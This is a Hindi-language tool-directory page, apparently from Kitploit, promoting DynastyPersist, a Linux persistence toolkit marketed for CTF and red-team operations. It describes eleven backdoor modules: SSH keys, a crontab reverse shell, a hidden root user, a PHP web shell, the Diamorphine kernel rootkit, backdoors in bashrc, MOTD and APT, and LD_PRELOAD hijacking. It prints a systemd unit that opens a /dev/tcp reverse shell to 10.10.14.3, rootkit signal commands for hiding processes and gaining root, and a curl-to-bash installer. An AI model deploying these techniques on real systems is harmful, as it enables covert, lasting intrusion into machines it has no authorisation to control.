Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/trevohack/dynastypersist
विशेषाधिकार वृद्धिस्थायित्व तंत्रपोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubtrevohack/dynastypersist

DynastyPersist

SSH कुंजी बैकडोर, क्रॉनजॉब्स, सिस्टमडी सेवाओं, LKM रूटकिट्स और LD_PRELOAD विशेषाधिकार वृद्धि के लिए 11 मॉड्यूल्स के साथ लिनक्स पर्सिस्टेंस टूलकिट। CTF प्रतियोगिताओं और रेड टीम संचालन के लिए डिज़ाइन किया गया।

रिपॉजिटरी देखें
1622111 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

DynastyPersist 1.5

DynastyPersist: लिनक्स में स्थायित्व (persistence) प्राप्त करने के लिए एक सरलीकृत उपकरण।
समर्थन करता है KoTH, Battlegrounds और Pentest Operations

GitHub License GitHub Repo stars Static Badge

स्थापना • दस्तावेज़ीकरण • उपयोग

चित्र

दस्तावेज़ीकरण

[ सुविधाएँ ]

सुविधाएँविवरण
SSH कुंजी निर्माणगुप्त पहुंच के लिए स्वचालित रूप से SSH कुंजियाँ उत्पन्न करता है।
क्रॉनजॉब स्थायित्वनिर्धारित स्थायित्व के लिए क्रॉनजॉब सेट करता है।
रूट के साथ कस्टम उपयोगकर्तारूट विशेषाधिकारों वाला एक कस्टम उपयोगकर्ता बनाता है।
RCE स्थायित्वरिमोट कोड निष्पादन के माध्यम से स्थायित्व प्राप्त करता है
LKM/रूटकिटलिनक्स कर्नेल मॉड्यूल (LKM) आधारित रूटकिट स्थायित्व प्रदर्शित करता है।
Bashrc स्थायित्वस्थायित्व के लिए उपयोगकर्ता-विशिष्ट शेल इनिशियलाइज़ेशन फ़ाइलों को संशोधित करता है (उपनाम / रिवर्स शेल)।
रूट के लिए Systemd सेवारूट स्थायित्व प्राप्त करने के लिए systemd सेवा सेट करता है।
LD_PRELOAD विशेषाधिकार वृद्धि कॉन्फ़िगविशेषाधिकार वृद्धि के लिए LD_PRELOAD कॉन्फ़िगर करता है।
दिन का संदेश / हेडर बैकडोर करनागुप्त पहुंच के लिए सिस्टम संदेश प्रदर्शन को बैकडोर करता है।
मौजूदा Systemd सेवा को संशोधित करनास्थायित्व के लिए किसी मौजूदा systemd सेवा में हेरफेर करता है।
APT कमांड को बैकडोर करनाapt कमांड को बैकडोर करता है ताकि एक शेल पॉप अप हो।

[ मॉड्यूल ]

SSH कुंजी निर्माण

  • ssh कुंजी निर्माण का उपयोग करके सर्वर तक पहुंच प्राप्त करें। यह मॉड्यूल प्रत्येक उपयोगकर्ता के लिए एक id_rsa कुंजी बनाता है। जिसका उपयोग रिवर्स पहुंच के लिए किया जा सकता है। इस मॉड्यूल को चलाने के बाद, हमलावर ssh के माध्यम से सर्वर से कनेक्ट कर सकता है।

  • इसे मैन्युअल रूप से ssh-keygen कमांड का उपयोग करके किया जा सकता है। हालांकि, यह मॉड्यूल तुरंत प्रत्येक उपयोगकर्ता के लिए एक निजी कुंजी बनाता है।

root@kitploit:~
root@kali ~ ssh -i id_rsa [email protected]
  • मॉड्यूल संख्या: 1

क्रॉनजॉब स्थायित्व

  • लिनक्स में क्रॉनजॉब निर्धारित कार्य होते हैं जो निर्दिष्ट अंतराल पर स्वचालित रूप से चलते हैं।

  • सबसे कुशल मॉड्यूलों में से एक, जिसमें रिवर्स शेल शामिल हैं। यह मॉड्यूल सीधे रिवर्स शेल कमांड को /etc/crontab में लिखता है। जो आपके सुनने वाले पोर्ट पर एक शेल पॉप अप करेगा।

root@kitploit:~
root@kali ~ nc -nvlp 9999
  • मॉड्यूल संख्या: 2

रूट के साथ कस्टम उपयोगकर्ता

  • रिवर्स पहुंच प्राप्त करने का एक सरल और तेज़ तरीका। यह मॉड्यूल रूट पहुंच वाला एक और उपयोगकर्ता बनाता है। बाद में, हमलावर ssh के माध्यम से उपयोगकर्ता में लॉगिन कर सकता है।
root@kitploit:~
root@kali ~ ssh [email protected]
  • मॉड्यूल संख्या: 3

RCE स्थायित्व

  • यह मॉड्यूल एक php स्क्रिप्ट के साथ आता है जो वेब रूट डायरेक्ट्री में होस्ट की जाती है। स्क्रिप्ट /var/www/html/dynasty_rce/rce.php पर स्थित है। इसके अलावा, यदि LKM मॉड्यूल पहले चलाया जाता है तो उपसर्ग dynasty_rce को छिपाया जा सकता है।

  • victim_ip:port/dynasty_rce/rce.php पर जाने से आपको शेल के भीतर कमांड चलाने की शक्ति मिलेगी।

  • मॉड्यूल संख्या: 4

LKM रूटकिट

  • एक उन्नत स्थायित्व विधि, जो सर्वर के कर्नेल में एक रूटकिट प्रत्यारोपित करती है। यह प्रोग्राम एक ओपन-सोर्स LKM रूटकिट पर केंद्रित है जिसे Diamorphine कहा जाता है। मॉड्यूल अस्थायी स्थान के रूप में /var/tmp/.memory में है। मॉड्यूल सेट अप होने के बाद यह निर्देशिका हटा दी जाती है।
  • नीचे दिया गया कोड ब्लॉक इस मॉड्यूल के उपयोगों को दर्शाता है।
root@kitploit:~
victim@ubuntu ~ kill -64 0 # Promtes to root user. 
victim@ubuntu ~ mkdir dynasty_persist # Any directory starting with dynasty will be hidden.
victim@ubuntu ~ kill -31 <process> # Hides processors
victim@ubuntu ~ lsmod | grep -i diamorphine # Hides itself 
victim@ubuntu ~ kill -63 0 # Make it appear in lsmod output
  • मॉड्यूल संख्या: 5

Bashrc स्थायित्व

  • यह मॉड्यूल रिवर्स पहुंच के लिए रिवर्स शेल कमांड, उपनाम और चर लिखता है। जब कोई उपयोगकर्ता सर्वर में लॉगिन करता है या व्यक्ति find या cat का उपयोग करता है तो एक शेल प्राप्त होता है।
root@kitploit:~
root@kali ~ nc -nvlp 9999
  • मॉड्यूल संख्या: 6

रूट के लिए Systemd सेवा

  • रिवर्स पहुंच के लिए systemd में एक कस्टम सेवा बनाने वाला मॉड्यूल।

  • एक उदाहरण:

root@kitploit:~
Description=Dynasty Persist

[Service]
ExecStart=sudo bash /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/9999 0>&1'
Restart=always
RestartSec=30

[Install]
WantedBy=default.target"
  • उपरोक्त उदाहरण, एक सेवा के रूप में बनाया जाएगा। यह विधि कुशल और टिकाऊ है।

  • मॉड्यूल संख्या: 7

LD_PRELOAD विशेषाधिकार वृद्धि कॉन्फ़िग

  • LD_PRELOAD लिनक्स में एक पर्यावरण चर है जो उपयोगकर्ताओं को अन्य लाइब्रेरीज़ से पहले एक साझा लाइब्रेरी प्रीलोड करने की अनुमति देता है। LD_PRELOAD का उपयोग करके विशेषाधिकार वृद्धि में एक दुर्भावनापूर्ण लाइब्रेरी लोड करके सिस्टम कॉल को इंटरसेप्ट और संशोधित करना शामिल है, जिससे संभावित रूप से उन्नत विशेषाधिकार प्राप्त होते हैं। यह मॉड्यूल find और wget जैसे कमांड को बैकडोर करता है।

  • मॉड्यूल संख्या: 8

दिन का संदेश / हेडर बैकडोर करना

  • लिनक्स में "दिन का संदेश" (MOTD) एक अनुकूलन योग्य पाठ है जो उपयोगकर्ताओं को लॉगिन पर प्रदर्शित होता है, जो सिस्टम के बारे में जानकारी या अपडेट प्रदान करता है। यह आमतौर पर /etc/motd फ़ाइल में संग्रहीत होता है और सिस्टम प्रशासकों द्वारा संशोधित किया जा सकता है।

  • यह मॉड्यूल, /etc/update-motd.d/00-header में एक शेल लिखता है। यह आमतौर पर तब ट्रिगर होता है जब कोई उपयोगकर्ता लॉगिन करता है।

  • मॉड्यूल संख्या: 9

मौजूदा Systemd सेवा को संशोधित करना

  • मॉड्यूल 7 के समान, यह रिवर्स पहुंच के लिए एक मौजूदा सेवा को संशोधित करता है।

  • बस, यह सेवा में ExecStartPre को एक रिवर्स शेल कमांड से पुनर्लिखित करता है।

  • मॉड्यूल संख्या: 10

APT बैकडोर

  • "APT" एडवांस्ड पैकेज टूल के लिए खड़ा है, और इसका उपयोग आमतौर पर उबंटू जैसे डेबियन-आधारित सिस्टम में किया जाता है। फ़ाइल यहाँ होगी: /etc/apt/apt.conf.d/42backdoor

  • apt कमांड को बैकडोर करता है, जब भी apt चलाया जाता है तो एक शेल पॉप अप होगा।

  • मॉड्यूल संख्या: 11

[ मोड ]

  • वर्तमान में, नवीनतम अपडेट (1.4) में 2 मोड उपलब्ध हैं।

  • मोड console और ctf हैं जो एक विशिष्ट व्यवहार में काम करने के लिए डिज़ाइन किए गए हैं।

  • तुलना में, console मोड ctf मोड की तुलना में अधिक सुविधाओं और स्थिरता के साथ आता है।

Console

  • console मोड टूल को सामान्य सेटअप में प्रवेश कराता है, जिसमें सभी सुविधाएँ शामिल हैं। ये सुविधाएँ स्थानीय होस्ट पर चलेंगी जहाँ स्क्रिप्ट निष्पादित की जा रही है। वास्तविक समय के संचालन में स्थायित्व के लिए डिज़ाइन किया गया है।

  • किसी चयनित मॉड्यूल को चलाने के लिए use के बाद मॉड्यूल संख्या का उपयोग किया जाएगा। जैसे, use 1

  • साथ ही, इंटरफ़ेस अपडेट किया गया है, मॉड्यूल/पेलोड अब दिखाई देते हैं जब आप show payloads टाइप करते हैं।

  • अंत में, सहायता/विकल्प मेनू भी संशोधित किया गया है, इसे देखने के लिए show options दर्ज करें।

CTF

  • ctf मोड एक अतिरिक्त सुविधा है जो एक समझौता किए गए सर्वर में SSH के माध्यम से लॉगिन करने और स्थायित्व प्राप्त करने के लिए है। यह ऐड-ऑन KoTH या Battlegrounds में बहुत मदद करेगा। इसके अलावा, यह स्थायित्व सेट अप करने में लगने वाले समय को बहुत बचाएगा।

  • console में अधिकांश फ़ंक्शन चलाता है।

[ उपयोग ]

  • टूल का उपयोग करने का सिंटैक्स नीचे वर्णित है:
root@kitploit:~
$ ./dynasty.sh <lhost> <lport> <mode> 
$ ./dynasty.sh ctf 
$ ./dynasty.sh 10.10.14.3 9999 console 

स्थापना

Git के माध्यम से

root@kitploit:~
$ git clone https://github.com/Trevohack/DynastyPersist
$ cd DynastyPersist/src 

Curl के माध्यम से

root@kitploit:~
$ curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

धन्यवाद!

टूल डाउनलोड करें